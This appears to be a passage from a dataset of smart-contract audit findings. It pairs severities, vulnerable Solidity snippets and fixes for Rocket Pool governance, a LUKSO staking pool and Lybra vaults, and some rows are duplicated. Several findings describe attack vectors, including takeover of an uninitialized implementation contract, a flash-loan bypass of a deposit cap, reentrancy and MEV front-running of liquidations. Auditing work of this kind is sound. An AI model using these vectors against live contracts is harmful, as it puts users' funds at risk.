SettingType[] memory _types, bytes[] memory _values) override external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAOProtocol"", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAOProtocolProposalsInterface(getContractAddress(""rocketDAOProtocolProposals"")).proposalSettingMulti(_settingContractNames, _settingPaths, _types, _values);\\n}\\n\\n/// @notice Bootstrap mode - Uint Setting\\nfunction bootstrapSettingUint(string memory _settingContractName, string memory _settingPath, uint256 _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAOProtocol"", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAOProtocolProposalsInterface(getContractAddress(""rocketDAOProtocolProposals"")).proposalSettingUint(_settingContractName, _settingPath, _value);\\n}\\n```\\n\\nTreasury address setter:\\n```\\nfunction bootstrapTreasuryNewContract(string memory _contractName, address _recipientAddress, uint256 _amountPerPeriod, uint256 _periodLength, uint256 _startTime, uint256 _numPeriods) override external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAOProtocol"", address(this)) {\\n RocketDAOProtocolProposalsInterface(getContractAddress(""rocketDAOProtocolProposals"")).proposalTreasuryNewContract(_contractName, _recipientAddress, _amountPerPeriod, _periodLength, _startTime, _numPeriods);\\n}\\n```\\n\\nBootstrap mode management:\\n```\\nfunction bootstrapDisable(bool _confirmDisableBootstrapMode) override external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAOProtocol"", address(this)) {\\n require(_confirmDisableBootstrapMode == true, ""You must confirm disabling bootstrap mode, it can only be done once!"");\\n setBool(keccak256(abi.encodePacked(daoNameSpace, ""bootstrapmode.disabled"")), true);\\n}\\n```\\n\\nOne-time treasury spends:\\n```\\nfunction bootstrapSpendTreasury(string memory _invoiceID, address _recipientAddress, uint256 _amount) override 
external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAOProtocol"", address(this)) {\\n RocketDAOProtocolProposalsInterface(getContractAddress(""rocketDAOProtocolProposals"")).proposalTreasuryOneTimeSpend(_invoiceID, _recipientAddress, _amount);\\n}\\n```\\n\\n```\\nfunction setDelegate(address _newDelegate) external override onlyRegisteredNode(msg.sender) {\\n```\\n\\n```\\nfunction proposalSettingUint(string memory _settingNameSpace, string memory _settingPath, uint256 _value) override public onlyExecutingContracts() onlyValidSetting(_settingNameSpace, _settingPath) {\\n bytes32 namespace = keccak256(abi.encodePacked(protocolDaoSettingNamespace, _settingNameSpace));\\n```\\n\\n```\\nfunction proposalSettingBool(string memory _settingNameSpace, string memory _settingPath, bool _value) override public onlyExecutingContracts() onlyValidSetting(_settingNameSpace, _settingPath) {\\n bytes32 namespace = keccak256(abi.encodePacked(protocolDaoSettingNamespace, _settingNameSpace));\\n```\\n\\n```\\nfunction proposalSettingAddress(string memory _settingNameSpace, string memory _settingPath, address _value) override public onlyExecutingContracts() onlyValidSetting(_settingNameSpace, _settingPath) {\\n bytes32 namespace = keccak256(abi.encodePacked(protocolDaoSettingNamespace, _settingNameSpace));\\n```\\n\\n```\\nfunction proposalInvite(string calldata _id, address _memberAddress) override public onlyLatestContract(""rocketDAOProtocolProposals"", msg.sender) {\\n // Their proposal executed, record the block\\n```\\n","Resolution\\nThe client implemented a fix in commit `1be41a88a40125baf58d8904770cd9eb9e0732bb` and provided the following statement:\\nRocketDAONodeTrusted is not a contract that is getting upgrade so this won't be fixed\\nRocketDAOProtocol has been updated to include events for each bootstrap function\\nRocketNetworkVoting has been updated to emit an event\\nRocketDAOSecurityProposals has been updated to emit events for all proposals\\nWe 
recommend emitting events on state changes, particularly when these are performed by an authorized party. The implementation of the recommendation should be analogous to the handling of events on state changes in the rest of the system, such as in the `RocketMinipoolPenalty` contract:\\n```\\nfunction setMaxPenaltyRate(uint256 _rate) external override onlyGuardian {\\n // Update rate\\n maxPenaltyRate = _rate;\\n // Emit event\\n emit MaxPenaltyRateUpdated(_rate, block.timestamp);\\n}\\n```\\n",,"```\\nfunction bootstrapMember(string memory _id, string memory _url, address _nodeAddress) override external onlyGuardian onlyBootstrapMode onlyRegisteredNode(_nodeAddress) onlyLatestContract(""rocketDAONodeTrusted"", address(this)) {\\n // Ok good to go, lets add them\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(""rocketDAONodeTrustedProposals"")).proposalInvite(_id, _url, _nodeAddress);\\n}\\n\\n\\n// Bootstrap mode - Uint Setting\\nfunction bootstrapSettingUint(string memory _settingContractName, string memory _settingPath, uint256 _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAONodeTrusted"", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(""rocketDAONodeTrustedProposals"")).proposalSettingUint(_settingContractName, _settingPath, _value);\\n}\\n\\n// Bootstrap mode - Bool Setting\\nfunction bootstrapSettingBool(string memory _settingContractName, string memory _settingPath, bool _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAONodeTrusted"", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(""rocketDAONodeTrustedProposals"")).proposalSettingBool(_settingContractName, _settingPath, _value);\\n}\\n```\\n" +RocketDAOProtocolProposal._propose() Should Revert if _blockNumber > block.number,medium,"Currently, the 
`RocketDAOProtocolProposal._propose()` function does not account for scenarios where `_blockNumber` is greater than `block.number`. This is a critical oversight, as voting power cannot be determined for future block numbers.\\n```\\nfunction _propose(string memory _proposalMessage, uint256 _blockNumber, uint256 _totalVotingPower, bytes calldata _payload) internal returns (uint256) {\\n```\\n",We recommend updating the function to revert on transactions where `_blockNumber` exceeds `block.number`. This will prevent the creation of proposals with undefined voting power and maintain the integrity of the voting process.,,"```\\nfunction _propose(string memory _proposalMessage, uint256 _blockNumber, uint256 _totalVotingPower, bytes calldata _payload) internal returns (uint256) {\\n```\\n" +Unused Parameter and Improper Parameter Sanitization in RocketNetworkVoting.calculateVotingPower(),low,"The `matchedETH` parameter in `RocketNetworkVoting.calculateVotingPower()` is unused.\\n```\\n// Get contracts\\nRocketDAOProtocolSettingsNodeInterface rocketDAOProtocolSettingsNode = RocketDAOProtocolSettingsNodeInterface(getContractAddress(""rocketDAOProtocolSettingsNode""));\\n```\\n\\nAdditionally, the `_block` parameter is not sanitized. Thus, if calling the function with a block number `_block` where `_block >= block.number`, the call will revert because of a division-by-zero error. Indeed, `rocketNetworkSnapshots.lookupRecent` will return a `rplPrice` of zero since the checkpoint does not exist. 
Consequently, the function `calculateVotingPower` will revert when computing the `maximumStake`.\\n```\\nkey = keccak256(abi.encodePacked(""rpl.staked.node.amount"", _nodeAddress));\\nuint256 rplStake = uint256(rocketNetworkSnapshots.lookupRecent(key, uint32(_block), 5));\\n\\nreturn calculateVotingPower(rplStake, ethMatched, ethProvided, rplPrice);\\n```\\n\\n```\\nuint256 maximumStake = providedETH * maximumStakePercent / rplPrice;\\n```\\n","We recommend removing the unused parameter to enhance code clarity. The presence of unused parameters can lead to potential confusion for future developers. Additionally, we recommend ensuring that the snapshotted `rplPrice` value exists before it is used to compute the `maximumStake` value.",,"```\\n// Get contracts\\nRocketDAOProtocolSettingsNodeInterface rocketDAOProtocolSettingsNode = RocketDAOProtocolSettingsNodeInterface(getContractAddress(""rocketDAOProtocolSettingsNode""));\\n```\\n" +Wrong/Misleading NatSpec Documentation,low,"The NatSpec documentation in several parts of the code base contains inaccuracies or is misleading. 
This issue can lead to misunderstandings about how the code functions, especially for developers who rely on these comments for clarity and guidance.\\nIn `RocketDAOProtocolProposal`, the NatSpec comments are potentially misleading:\\n```\\n/// @notice Get the votes against count of this proposal\\n/// @param _proposalID The ID of the proposal to query\\n```\\n\\n```\\n/// @notice Returns true if this proposal was supported by this node\\n/// @param _proposalID The ID of the proposal to query\\n/// @param _nodeAddress The node operator address to query\\nfunction getReceiptDirection(uint256 _proposalID, address _nodeAddress) override public view returns (VoteDirection) {\\n return VoteDirection(getUint(keccak256(abi.encodePacked(daoProposalNameSpace, ""receipt.direction"", _proposalID, _nodeAddress))));\\n}\\n```\\n\\nIn RocketDAOProtocolVerifier, the NatSpec documentation is incomplete, which might leave out critical information about the function's purpose and behavior:\\n```\\n/// @notice Used by a verifier to challenge a specific index of a proposal's voting power tree\\n/// @param _proposalID The ID of the proposal being challenged\\n/// @param _index The global index of the node being challenged\\n```\\n",The NatSpec documentation should be thoroughly reviewed and corrected where necessary. We recommend ensuring it accurately reflects the code's functionality and provides complete information.,,```\\n/// @notice Get the votes against count of this proposal\\n/// @param _proposalID The ID of the proposal to query\\n```\\n +RocketDAOProtocolSettingsRewards.setSettingRewardClaimPeriods() Cannot Be Invoked,low,"```\\nsetUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""periods"")), _periods);\\n```\\n","To make this function useful and align it with its intended purpose, we recommend integrating its functionality into `RocketDAOProtocolProposals`. 
In addition, we recommend that this function emit an event upon successful change of settings, enhancing the transparency of the operation.",,"```\\nsetUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""periods"")), _periods);\\n```\\n" +No Protection of Uninitialized Implementation Contracts From Attacker,medium,"In the contracts implement Openzeppelin's UUPS model, uninitialized implementation contract can be taken over by an attacker with `initialize` function, it's recommended to invoke the `_disableInitializers` function in the constructor to prevent the implementation contract from being used by the attacker. However all the contracts which implements `OwnablePausableUpgradeable` do not call `_disableInitializers` in the constructors\\n```\\ncontract Rewards is IRewards, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n\\n```\\ncontract Pool is IPool, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n\\n```\\ncontract StakedLyxToken is OwnablePausableUpgradeable, LSP4DigitalAssetMetadataInitAbstract, IStakedLyxToken, ReentrancyGuardUpgradeable {\\n```\\n\\netc.",Invoke `_disableInitializers` in the constructors of contracts which implement `OwnablePausableUpgradeable` including following:\\n```\\nPool\\nPoolValidators\\nFeeEscrow\\nReward\\nStakeLyxTokem\\nOracles \\nMerkleDistributor\\n```\\n,,"```\\ncontract Rewards is IRewards, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n" +Unsafe Function receiveFees Acknowledged,low,"In the Pool contract, function `receiveFees` is used for compensate a potential penalty/slashing in the protocol by sending LYX back to the pool without minting sLYX, but the side effect is that anyone can send LYX to the pool which could mess up pool balance after all validator exited, in fact it can be replaced by a another function `receiveWithoutActivation` with access control which does the same thing.\\n```\\nfunction receiveFees() external payable override 
{}\\n```\\n\\n```\\nfunction receiveWithoutActivation() external payable override {\\n require(msg.sender == address(stakedLyxToken) || hasRole(DEFAULT\\_ADMIN\\_ROLE, msg.sender), ""Pool: access denied"");\\n}\\n```\\n",Remove function `receiveFees`,,```\\nfunction receiveFees() external payable override {}\\n```\\n +Unnecessary Matching in Unstake Process,low,"Function `unstakeProcessed` in `StakedLyxToken` contract, when `unstakeAmount > totalPendingUnstake`, all the unstake requests should be able to be processed, thus no need to go through the matching, as a result, extra gas in the matching can be saved.\\n```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n}\\n\\ntotalPendingUnstake -= unstakeAmount;\\ntotalUnstaked += unstakeAmount;\\nuint256 amountToFill = unstakeAmount;\\n\\nfor (uint256 i = unstakeRequestCurrentIndex; i <= unstakeRequestCount; i++) {\\n UnstakeRequest storage request = \\_unstakeRequests[i];\\n if (amountToFill > (request.amount - request.amountFilled)) {\\n amountToFill -= (request.amount - request.amountFilled);\\n continue;\\n } else {\\n if (amountToFill == (request.amount - request.amountFilled) && i < unstakeRequestCount) {\\n unstakeRequestCurrentIndex = i + 1;\\n } else {\\n request.amountFilled += uint128(amountToFill);\\n unstakeRequestCurrentIndex = i;\\n }\\n break;\\n }\\n}\\n```\\n","Put the matching part (line 393-411) into else branch of `if unstakeAmount > totalPendingUnstake`, change the if branch into following:\\n```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n totalPendingUnstake = 0;\\n unstakeRequestCurrentIndex = unstakeRequestCount;\\n _unstakeRequests[unstakeRequestCount].amountFilled = _unstakeRequests[unstakeRequestCount].amount;\\n } \\n```\\n",,```\\nif (unstakeAmount > 
totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n}\\n\\ntotalPendingUnstake -= unstakeAmount;\\ntotalUnstaked += unstakeAmount;\\nuint256 amountToFill = unstakeAmount;\\n\\nfor (uint256 i = unstakeRequestCurrentIndex; i <= unstakeRequestCount; i++) {\\n UnstakeRequest storage request = \\_unstakeRequests[i];\\n if (amountToFill > (request.amount - request.amountFilled)) {\\n amountToFill -= (request.amount - request.amountFilled);\\n continue;\\n } else {\\n if (amountToFill == (request.amount - request.amountFilled) && i < unstakeRequestCount) {\\n unstakeRequestCurrentIndex = i + 1;\\n } else {\\n request.amountFilled += uint128(amountToFill);\\n unstakeRequestCurrentIndex = i;\\n }\\n break;\\n }\\n}\\n```\\n +No Protection of Uninitialized Implementation Contracts From Attacker,medium,"In the contracts implement Openzeppelin's UUPS model, uninitialized implementation contract can be taken over by an attacker with `initialize` function, it's recommended to invoke the `_disableInitializers` function in the constructor to prevent the implementation contract from being used by the attacker. 
However all the contracts which implements `OwnablePausableUpgradeable` do not call `_disableInitializers` in the constructors\\n```\\ncontract Rewards is IRewards, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n\\n```\\ncontract Pool is IPool, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n\\n```\\ncontract StakedLyxToken is OwnablePausableUpgradeable, LSP4DigitalAssetMetadataInitAbstract, IStakedLyxToken, ReentrancyGuardUpgradeable {\\n```\\n\\netc.",Invoke `_disableInitializers` in the constructors of contracts which implement `OwnablePausableUpgradeable` including following:\\n```\\nPool\\nPoolValidators\\nFeeEscrow\\nReward\\nStakeLyxTokem\\nOracles \\nMerkleDistributor\\n```\\n,,"```\\ncontract Rewards is IRewards, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n" +Unnecessary Matching in Unstake Process,low,"Function `unstakeProcessed` in `StakedLyxToken` contract, when `unstakeAmount > totalPendingUnstake`, all the unstake requests should be able to be processed, thus no need to go through the matching, as a result, extra gas in the matching can be saved.\\n```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n}\\n\\ntotalPendingUnstake -= unstakeAmount;\\ntotalUnstaked += unstakeAmount;\\nuint256 amountToFill = unstakeAmount;\\n\\nfor (uint256 i = unstakeRequestCurrentIndex; i <= unstakeRequestCount; i++) {\\n UnstakeRequest storage request = \\_unstakeRequests[i];\\n if (amountToFill > (request.amount - request.amountFilled)) {\\n amountToFill -= (request.amount - request.amountFilled);\\n continue;\\n } else {\\n if (amountToFill == (request.amount - request.amountFilled) && i < unstakeRequestCount) {\\n unstakeRequestCurrentIndex = i + 1;\\n } else {\\n request.amountFilled += uint128(amountToFill);\\n unstakeRequestCurrentIndex = i;\\n }\\n break;\\n }\\n}\\n```\\n","Put the matching 
part (line 393-411) into else branch of `if unstakeAmount > totalPendingUnstake`, change the if branch into following:\\n```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n totalPendingUnstake = 0;\\n unstakeRequestCurrentIndex = unstakeRequestCount;\\n _unstakeRequests[unstakeRequestCount].amountFilled = _unstakeRequests[unstakeRequestCount].amount;\\n } \\n```\\n",,```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n}\\n\\ntotalPendingUnstake -= unstakeAmount;\\ntotalUnstaked += unstakeAmount;\\nuint256 amountToFill = unstakeAmount;\\n\\nfor (uint256 i = unstakeRequestCurrentIndex; i <= unstakeRequestCount; i++) {\\n UnstakeRequest storage request = \\_unstakeRequests[i];\\n if (amountToFill > (request.amount - request.amountFilled)) {\\n amountToFill -= (request.amount - request.amountFilled);\\n continue;\\n } else {\\n if (amountToFill == (request.amount - request.amountFilled) && i < unstakeRequestCount) {\\n unstakeRequestCurrentIndex = i + 1;\\n } else {\\n request.amountFilled += uint128(amountToFill);\\n unstakeRequestCurrentIndex = i;\\n }\\n break;\\n }\\n}\\n```\\n +Re-Entrancy Risks Associated With External Calls With Other Liquid Staking Systems.,high,"As part of the strategy to integrate with Liquid Staking tokens for Ethereum staking, the Lybra Protocol vaults are required to make external calls to Liquid Staking systems.\\nFor example, the `depositEtherToMint` function in the vaults makes external calls to deposit Ether and receive the LSD tokens back. While external calls to untrusted third-party contracts may be dangerous, in this case, the Lybra Protocol already extends trust assumptions to these third parties simply through the act of accepting their tokens as collateral. 
Indeed, in some cases the contract addresses are even hardcoded into the contract and called directly instead of relying on some registry:\\n```\\ncontract LybraWstETHVault is LybraPeUSDVaultBase {\\n Ilido immutable lido;\\n //WstETH = 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0;\\n //Lido = 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84;\\n constructor(address \\_lido, address \\_asset, address \\_oracle, address \\_config) LybraPeUSDVaultBase(\\_asset, \\_oracle, \\_config) {\\n lido = Ilido(\\_lido);\\n }\\n\\n function depositEtherToMint(uint256 mintAmount) external payable override {\\n require(msg.value >= 1 ether, ""DNL"");\\n uint256 sharesAmount = lido.submit{value: msg.value}(address(configurator));\\n require(sharesAmount != 0, ""ZERO\\_DEPOSIT"");\\n lido.approve(address(collateralAsset), msg.value);\\n uint256 wstETHAmount = IWstETH(address(collateralAsset)).wrap(msg.value);\\n depositedAsset[msg.sender] += wstETHAmount;\\n if (mintAmount > 0) {\\n \\_mintPeUSD(msg.sender, msg.sender, mintAmount, getAssetPrice());\\n }\\n emit DepositEther(msg.sender, address(collateralAsset), msg.value,wstETHAmount, block.timestamp);\\n }\\n```\\n\\nIn that case, depending on the contract, it may be known what contract is being called, and the risk may be assessed as far as what logic may be executed.\\nHowever, in the cases of `BETH` and `rETH`, the calls are being made into a proxy and a contract registry of a DAO (RocketPool's DAO) respectively.\\n```\\ncontract LybraWBETHVault is LybraPeUSDVaultBase {\\n //WBETH = 0xa2e3356610840701bdf5611a53974510ae27e2e1\\n constructor(address \\_asset, address \\_oracle, address \\_config)\\n LybraPeUSDVaultBase(\\_asset, \\_oracle, \\_config) {}\\n\\n function depositEtherToMint(uint256 mintAmount) external payable override {\\n require(msg.value >= 1 ether, ""DNL"");\\n uint256 preBalance = collateralAsset.balanceOf(address(this));\\n IWBETH(address(collateralAsset)).deposit{value: msg.value}(address(configurator));\\n uint256 
balance = collateralAsset.balanceOf(address(this));\\n depositedAsset[msg.sender] += balance - preBalance;\\n\\n if (mintAmount > 0) {\\n \\_mintPeUSD(msg.sender, msg.sender, mintAmount, getAssetPrice());\\n }\\n\\n emit DepositEther(msg.sender, address(collateralAsset), msg.value,balance - preBalance, block.timestamp);\\n }\\n```\\n\\n```\\nconstructor(address \\_rocketStorageAddress, address \\_rETH, address \\_oracle, address \\_config)\\n LybraPeUSDVaultBase(\\_rETH, \\_oracle, \\_config) {\\n rocketStorage = IRocketStorageInterface(\\_rocketStorageAddress);\\n}\\n\\nfunction depositEtherToMint(uint256 mintAmount) external payable override {\\n require(msg.value >= 1 ether, ""DNL"");\\n uint256 preBalance = collateralAsset.balanceOf(address(this));\\n IRocketDepositPool(rocketStorage.getAddress(keccak256(abi.encodePacked(""contract.address"", ""rocketDepositPool"")))).deposit{value: msg.value}();\\n uint256 balance = collateralAsset.balanceOf(address(this));\\n depositedAsset[msg.sender] += balance - preBalance;\\n\\n if (mintAmount > 0) {\\n \\_mintPeUSD(msg.sender, msg.sender, mintAmount, getAssetPrice());\\n }\\n\\n emit DepositEther(msg.sender, address(collateralAsset), msg.value,balance - preBalance, block.timestamp);\\n}\\n```\\n\\nAs a result, it is impossible to make any guarantees for what logic will be executed during the external calls. Namely, reentrancy risks can't be ruled out, and the damage could be critical to the system. While the trust in these parties isn't in question, it would be best practice to avoid any additional reentrancy risks by placing reentrancy guards. 
Indeed, in the `LybraRETHVault` and `LybraWbETHVault` contracts, one can see the possible damage as the calls are surrounded in a `preBalance <-> balance` pattern.\\nThe whole of third party Liquid Staking systems' operations need not be compromised, only these particular parts would be enough to cause critical damage to the Lybra Protocol.","After conversations with the Lybra Finance team, it has been assessed that reentrancy guards are appropriate in this scenario to avoid any potential reentrancy risk, which is exactly the recommendation this audit team would provide.",,"```\\ncontract LybraWstETHVault is LybraPeUSDVaultBase {\\n Ilido immutable lido;\\n //WstETH = 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0;\\n //Lido = 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84;\\n constructor(address \\_lido, address \\_asset, address \\_oracle, address \\_config) LybraPeUSDVaultBase(\\_asset, \\_oracle, \\_config) {\\n lido = Ilido(\\_lido);\\n }\\n\\n function depositEtherToMint(uint256 mintAmount) external payable override {\\n require(msg.value >= 1 ether, ""DNL"");\\n uint256 sharesAmount = lido.submit{value: msg.value}(address(configurator));\\n require(sharesAmount != 0, ""ZERO\\_DEPOSIT"");\\n lido.approve(address(collateralAsset), msg.value);\\n uint256 wstETHAmount = IWstETH(address(collateralAsset)).wrap(msg.value);\\n depositedAsset[msg.sender] += wstETHAmount;\\n if (mintAmount > 0) {\\n \\_mintPeUSD(msg.sender, msg.sender, mintAmount, getAssetPrice());\\n }\\n emit DepositEther(msg.sender, address(collateralAsset), msg.value,wstETHAmount, block.timestamp);\\n }\\n```\\n" +The Deployer of GovernanceTimelock Gets Privileged Access to the System.,high,"The `GovernanceTimelock` contract is responsible for Roles Based Access Control management and checks in the Lybra Protocol. 
It offers two functions specifically that check if an address has the required role - `checkRole` and checkOnlyRole:\\n```\\nfunction checkRole(bytes32 role, address \\_sender) public view returns(bool){\\n return hasRole(role, \\_sender) || hasRole(DAO, \\_sender);\\n}\\n\\nfunction checkOnlyRole(bytes32 role, address \\_sender) public view returns(bool){\\n return hasRole(role, \\_sender);\\n}\\n```\\n\\nIn `checkRole`, the contract also lets an address with the role `DAO` bypass the check altogether, making it a powerful role.\\nFor initial role management, when the `GovernanceTimelock` contract gets deployed, its constructor logic initializes a few roles, assigns relevant admin roles, and, notably, assigns the `DAO` role to the contract, and the `DAO` and the `GOV` role to the deployer.\\n```\\nconstructor(uint256 minDelay, address[] memory proposers, address[] memory executors, address admin) TimelockController(minDelay, proposers, executors, admin) {\\n \\n \\_setRoleAdmin(DAO, GOV);\\n \\_setRoleAdmin(TIMELOCK, GOV);\\n \\_setRoleAdmin(ADMIN, GOV);\\n \\_grantRole(DAO, address(this));\\n \\_grantRole(DAO, msg.sender);\\n \\_grantRole(GOV, msg.sender);\\n}\\n```\\n\\nThe assignment of such powerful roles to a single private key with the deployer has inherent risks. Specifically in our case, the `DAO` role alone as we saw may bypass many checks within the Lybra Protocol, and the `GOV` role even has role management privileges.\\nHowever, it does make sense to assign such roles at the beginning of the deployment to finish initialization and assign the rest of the roles. One could argue that having access to the `DAO` role in the early stages of the system's life could allow for quick disaster recovery in the event of incidents as well. 
Though, it is still dangerous to hold privileges for such a system in a single address as we have seen over the last years in security incidents that have to do with compromised keys.","While redesigning the deployment process to account for a lesser-privileged deployer would be ideal, the Lybra Finance team should at least transfer ownership as soon as the deployment is complete to minimize compromised private key risk.",,"```\\nfunction checkRole(bytes32 role, address \\_sender) public view returns(bool){\\n return hasRole(role, \\_sender) || hasRole(DAO, \\_sender);\\n}\\n\\nfunction checkOnlyRole(bytes32 role, address \\_sender) public view returns(bool){\\n return hasRole(role, \\_sender);\\n}\\n```\\n" +The configurator.getEUSDMaxLocked() Condition Can Be Bypassed During a Flashloan,medium,"When converting `EUSD` tokens to `peUSD`, there is a check that limits the total amount of `EUSD` that can be converted:\\n```\\nfunction convertToPeUSD(address user, uint256 eusdAmount) public {\\n require(\\_msgSender() == user || \\_msgSender() == address(this), ""MDM"");\\n require(eusdAmount != 0, ""ZA"");\\n require(EUSD.balanceOf(address(this)) + eusdAmount <= configurator.getEUSDMaxLocked(),""ESL"");\\n```\\n\\nThe issue is that there is a way to bypass this restriction. An attacker can get a flash loan (in EUSD) from this contract, essentially reducing the visible amount of locked tokens (EUSD.balanceOf(address(this))).",Multiple approaches can solve this issue. One would be adding reentrancy protection. 
Another one could be keeping track of the borrowed amount for a flashloan.,,"```\\nfunction convertToPeUSD(address user, uint256 eusdAmount) public {\\n require(\\_msgSender() == user || \\_msgSender() == address(this), ""MDM"");\\n require(eusdAmount != 0, ""ZA"");\\n require(EUSD.balanceOf(address(this)) + eusdAmount <= configurator.getEUSDMaxLocked(),""ESL"");\\n```\\n" +Liquidation Keepers Automatically Become eUSD Debt Providers for Other Liquidations.,medium,"One of the most important mechanisms in the Lybra Protocol is the liquidation of poorly collateralized vaults. For example, if a vault is found to have a collateralization ratio that is too small, a liquidator may provide debt tokens to the protocol and retrieve the vault collateral at a discount:\\n```\\nfunction liquidation(address provider, address onBehalfOf, uint256 assetAmount) external virtual {\\n uint256 assetPrice = getAssetPrice();\\n uint256 onBehalfOfCollateralRatio = (depositedAsset[onBehalfOf] \\* assetPrice \\* 100) / borrowed[onBehalfOf];\\n require(onBehalfOfCollateralRatio < badCollateralRatio, ""Borrowers collateral ratio should below badCollateralRatio"");\\n\\n require(assetAmount \\* 2 <= depositedAsset[onBehalfOf], ""a max of 50% collateral can be liquidated"");\\n require(EUSD.allowance(provider, address(this)) != 0, ""provider should authorize to provide liquidation EUSD"");\\n uint256 eusdAmount = (assetAmount \\* assetPrice) / 1e18;\\n\\n \\_repay(provider, onBehalfOf, eusdAmount);\\n uint256 reducedAsset = assetAmount \\* 11 / 10;\\n totalDepositedAsset -= reducedAsset;\\n depositedAsset[onBehalfOf] -= reducedAsset;\\n uint256 reward2keeper;\\n if (provider == msg.sender) {\\n collateralAsset.safeTransfer(msg.sender, reducedAsset);\\n } else {\\n reward2keeper = (reducedAsset \\* configurator.vaultKeeperRatio(address(this))) / 110;\\n collateralAsset.safeTransfer(provider, reducedAsset - reward2keeper);\\n collateralAsset.safeTransfer(msg.sender, reward2keeper);\\n }\\n emit 
LiquidationRecord(provider, msg.sender, onBehalfOf, eusdAmount, reducedAsset, reward2keeper, false, block.timestamp);\\n}\\n```\\n\\nTo liquidate the vault, the liquidator needs to transfer debt tokens from the provider address, which in turn needs to have had approved allowance of the token for the vault:\\n```\\nrequire(EUSD.allowance(provider, address(this)) != 0, ""provider should authorize to provide liquidation EUSD"");\\n```\\n\\nThe allowance doesn't need to be large, it only needs to be non-zero. While it is true that in the `superLiquidation` function the allowance check is for `eusdAmount`, which is the amount associated with `assetAmount` (the requested amount of collateral to be liquidated), the liquidator could simply call the maximum of the allowance the provider has given to the vault and then repeat the liquidation process. The allowance does not actually decrease throughout the liquidation process.\\n```\\nrequire(EUSD.allowance(provider, address(this)) >= eusdAmount, ""provider should authorize to provide liquidation EUSD"");\\n```\\n\\nNotably, this address doesn't have to be the same one as the liquidator. In fact, there are no checks on whether the liquidator has an agreement or allowance from the provider to use their tokens in this particular vault's liquidation. The contract only checks to see if the provider has `EUSD` allowance for the vault, and how to split the rewards if the provider is different from the liquidator:\\n```\\nif (provider == msg.sender) {\\n collateralAsset.safeTransfer(msg.sender, reducedAsset);\\n} else {\\n reward2keeper = (reducedAsset \\* configurator.vaultKeeperRatio(address(this))) / 110;\\n collateralAsset.safeTransfer(provider, reducedAsset - reward2keeper);\\n collateralAsset.safeTransfer(msg.sender, reward2keeper);\\n}\\n```\\n\\nIn fact, this is a design choice of the system to treat the allowance to the vault as an agreement to become a public provider of debt tokens for the liquidation process. 
It is important to note that there are incentives associated with being a provider as they get the collateral asset at a discount.\\nHowever, it is not obvious from documentation at the time of the audit nor the code that an address having a non-zero `EUSD` allowance for the vault automatically allows other users to use that address as a provider. Indeed, many general-purpose liquidator bots use their tokens during liquidations, using the same address for both the liquidator and the provider. As a result, this would put that address at the behest of any other user who would want to utilize these tokens in liquidations. The user might not be comfortable doing this trade in any case, even at a discount.\\nIn fact, due to this mechanism, even during consciously initiated liquidations MEV bots could spot this opportunity and front-run the liquidator's transaction. A frontrunner could put themselves as the keeper and the original user as the provider, grabbing the `reward2keeper` fee and leaving the original address with fewer rewards and failed gas after the liquidation.","While the mechanism is understood to be done for convenience and access to liquidity as a design decision, this could put unaware users in unfortunate situations of having performed a trade without explicit consent. Specifically, the MEV attack vector could be executed and repeated without fail by a capable actor monitoring the mempool. Consider having a separate, explicit flag for allowing others to use a user's tokens during liquidation, thus also accommodating solo liquidators by removing the MEV attack vector. 
